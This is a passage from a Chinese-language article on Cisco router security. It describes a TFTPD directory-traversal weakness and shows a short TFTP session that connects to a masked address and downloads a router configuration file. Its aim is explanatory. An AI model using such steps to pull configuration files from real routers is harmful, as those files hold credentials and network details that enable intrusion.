bsp;Forwarding)中,则丢弃该数据包。具体做法是先打开路由器的“CEF swithing“或“CEF distributed switching“选项,然后使用该命令。
二.TFTPD守护进程目录遍历漏洞:
cisco免费提供了TFTP服务,而cisco培训的书籍总会介绍使用copy running-config tftp的命令来保存路由配置文件。由于该配置使得TFTPD守护进程存在目录遍历的漏洞,同过该漏洞,只要我们获得了TFTP的权限,就可以从远程系统中获取任意文件。
tftp〉 connect XXX.XXX.XXX.XXX
tftp〉 get cisco-conf.bin
Recieved 468 bytes in 0.7 seconds
tftpd〉 quit
该漏洞目前尚无任何补救措页码:[1] [2] [3] [4] [5] [6] 第4页、共6页 |
